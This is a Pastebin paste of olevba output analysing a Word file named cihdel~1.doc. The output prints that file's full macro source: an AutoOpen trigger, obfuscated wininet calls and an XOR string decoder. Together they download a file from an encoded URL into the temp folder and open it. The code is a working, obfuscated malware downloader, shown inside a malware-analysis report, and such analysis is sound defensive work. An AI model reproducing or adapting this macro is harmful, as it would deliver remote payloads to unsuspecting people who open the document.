Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- cihdel~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: cihdel~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- ZasimSimZa
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO OIDL8.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/OIDL8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub ZasimSimZa()
- Dim CHEG As Integer
- CHEG = 34
- OLEOLEETOSLE (CHEG)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO PIDLE0.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function ETOKTOTUTPALIT4222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function ETOKTOTUTPALIT422 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function REKOMDED121 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As LongPtr, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function ETOKTOTUTPALIT4 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function ETOKTOTUTPALIT4222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function ETOKTOTUTPALIT422 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function REKOMDED121 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As Long, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function ETOKTOTUTPALIT4 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- Public Function ZIGRIGFIG9(KUKURUKUZUKU01 As String, KUKURUKUZUKU02 As String) As String
- Dim SEREBRAAA10 As Integer
- Dim SEREBRAAA101 As Integer
- Dim UTJJTTJ As Double
- For UTJJTTJ = 1 To 3
- If UTJJTTJ = 32 Then End
- Next UTJJTTJ
- Dim SEREBRAAA1 As Long
- Dim SEREBRAAA1O As String
- For SEREBRAAA1 = 1 _
- To _
- ( _
- LEFUNCLE1 _
- (KUKURUKUZUKU02) _
- / 2)
- SEREBRAAA10 = Val("&H" & _
- (Mid$(KUKURUKUZUKU02, _
- (2 * SEREBRAAA1) - 1, 2)))
- SEREBRAAA101 = Asc(Mid$(KUKURUKUZUKU01, _
- ((SEREBRAAA1 Mod Len(KUKURUKUZUKU01)) + 1), 1))
- SEREBRAAA1O = SEREBRAAA1O + Chr(SEREBRAAA10 Xor SEREBRAAA101)
- Next SEREBRAAA1
- ZIGRIGFIG9 = SEREBRAAA1O
- End Function
- Public Function LEFUNCLE1(ASASSAWWWWWWWW As String) As Integer
- LEFUNCLE1 = Len(ASASSAWWWWWWWW)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL4.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const WREGLEYSPEAR16 = "2A020E1E195A2A090219021604263D3B3B"
- Public Const WREGLEYSPEAR15 = "25191F1D1C1F0241445B0E0D00"
- Public Const WREGLEYSPEAR14 = "111E1F024F5B440E0502450116313C3B3021287C30377D63464B455B4B445A0E0117"
- Public Const WREGLEYSPEAR13 = "2A09191B05000217155B2D1C0937072D2621373F1B303837170D"
- Public Const WREGLEYSPEAR12 = "tyjkrutkyrukueRTTUURRTRRR"
- Public Function ItsALOOOP2(ByRef SAAARD1 As Object) As Object
- Set ItsALOOOP2 = SAAARD1.GetSpecialFolder(2)
- End Function
- Sub OLEOLEETOSLE(RUFRUFRUF As Long)
- ZERNOAA2 ("CA_LLS_AAAL_CSL_921_29")
- End Sub
- #If VBA7 _
- And Win64 Then
- Public Function SomeFunct4(ByRef RUKALICO87 As LongPtr, HLOPUSHKA6 As LongPtr) As Boolean
- #Else
- Public Function SomeFunct4(ByRef RUKALICO87 As Long, HLOPUSHKA6 As Long) As Boolean
- #End If
- Dim URLPURL1 As String
- URLPURL1 = ZIGRIGFIG9(WREGLEYSPEAR12, WREGLEYSPEAR14)
- RUKALICO87 _
- = ETOKTOTUTPALIT4 _
- ( _
- HLOPUSHKA6, _
- URLPURL1, vbNullString, _
- 0, _
- etoeshekto2, 0)
- SomeFunct4 = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO FILE6.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const FIRDISHANK21 = "HeXaRGUS"
- Public _
- Function ZERNOAA2(PIPKLIP5 _
- As _
- String)
- Sub1
- End Function
- Public Function Sub1()
- Dim KIKIPORAD7392 As Object
- Set KIKIPORAD7392 = CreateObject _
- (ZIGRIGFIG9(WREGLEYSPEAR12, WREGLEYSPEAR13))
- Dim FBRRWTEWT As Long
- For FBRRWTEWT = 0 To 1
- If KLALAKKSKKNNCN0 = 31 Then End
- Next FBRRWTEWT
- Dim ETOPART98 As Object
- Set ETOPART98 = ItsALOOOP2(KIKIPORAD7392)
- Dim AVAVAASSS As Double
- For AVAVAASSS = 1 To 3
- If AVAVAASSS = 32 Then End
- Next AVAVAASSS
- Dim FEWQQ23
- ASDFKJF = ZIGRIGFIG9(WREGLEYSPEAR12, WREGLEYSPEAR15)
- FEWQQ23 = ETOPART98 & ASDFKJF
- Dim VBEESFBSSB As Integer
- For VBEESFBSSB = 6 To 7
- If LOOO9371003942732 = 33 Then End
- Next VBEESFBSSB
- Dim NGTJT563 As Integer
- For NGTJT563 = 2 To 3
- If NGTJT563 = 34 Then End
- Next NGTJT563
- If ItsALOOOP3(KIKIPORAD7392, FEWQQ23) Then
- KIKIPORAD7392. _
- DeleteFile FEWQQ23
- End If
- If FERMERPIG76(FEWQQ23) Then
- End If
- Set SSSS = Nothing
- If ItsALOOOP3(KIKIPORAD7392, FEWQQ23) Then
- End If
- Set SIRDORBORMOG = CreateObject _
- (ZIGRIGFIG9 _
- (WREGLEYSPEAR12, WREGLEYSPEAR16))
- SIRDORBORMOG.Open FEWQQ23
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL3.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/IDL3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function ItsALOOOP3(ByRef HAARD6 As Object, ByVal ASXXX3 As String) As Boolean
- If HAARD6.FileExists(ASXXX3) Then
- ItsALOOOP3 = True
- Else
- ItsALOOOP3 = False
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO A0007.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/A0007'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Private Const VIKAPIKA1872 = 8162
- Private Const VIKAPIKA1871 As String = "HAZ"
- Private Const VIKAPIKA1999 = 1
- Private Const etoeshekto2 = &H4000000
- Public Function FERMERPIG76 _
- (ByVal AHESLIBIAHESLIBI As String) As Boolean
- #If VBA7 _
- And Win64 Then
- Dim THEP9RAM8 As LongPtr, K3AK4AY5AT6O9 As LongPtr
- #Else
- Dim THEP9RAM8 As Long, K3AK4AY5AT6O9 As Long
- #End If
- Dim CDSFDFD As Long
- Dim REKOMDEDEBET1 As String * VIKAPIKA1872, POKORO4E As String
- Dim SISKAPIR721 As Integer, DLINIYPAREN As Double
- THEP9RAM8 = ETOKTOTUTPALIT422(VIKAPIKA1871, VIKAPIKA1999, vbNullString, vbNullString, 0)
- If THEP9RAM8 = 0 Then
- Exit Function
- End If
- Dim FiGaMan As Boolean
- If SomeFunct4(K3AK4AY5AT6O9, THEP9RAM8) Then
- End If
- If K3AK4AY5AT6O9 = 0 Then
- DLINIYPAREN = 0
- Else
- REKOMDED121 K3AK4AY5AT6O9, REKOMDEDEBET1, VIKAPIKA1872, CDSFDFD
- POKORO4E = REKOMDEDEBET1
- Do While CDSFDFD <> 0
- REKOMDED121 K3AK4AY5AT6O9, REKOMDEDEBET1, VIKAPIKA1872, CDSFDFD
- Dim VSSDVZAAA As Long
- For VSSDVZAAA = 6 To 8
- If VSSDVZAAA = 38 Then End
- Next VSSDVZAAA
- POKORO4E = POKORO4E + Mid(REKOMDEDEBET1, 1, CDSFDFD)
- Loop
- DLINIYPAREN = Len(POKORO4E): SISKAPIR721 = FreeFile
- Open AHESLIBIAHESLIBI _
- For Binary Access Write _
- Lock Write _
- As #SISKAPIR721
- Put #SISKAPIR721, _
- , POKORO4E
- Dim HHHHHHHAAAAAAALLLLLLL As Double
- For HHHHHHHAAAAAAALLLLLLL = 2 To 3
- If HHHHHHHAAAAAAALLLLLLL = 37 Then End
- Next HHHHHHHAAAAAAALLLLLLL
- Close #SISKAPIR721
- End If
- ETOKTOTUTPALIT4222 K3AK4AY5AT6O9
- ETOKTOTUTPALIT4222 THEP9RAM8
- POKORO4E = ""
- If DLINIYPAREN Then
- FERMERPIG76 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO UserForm2.frm
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/UserForm2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO UserForm3.frm
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/UserForm3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement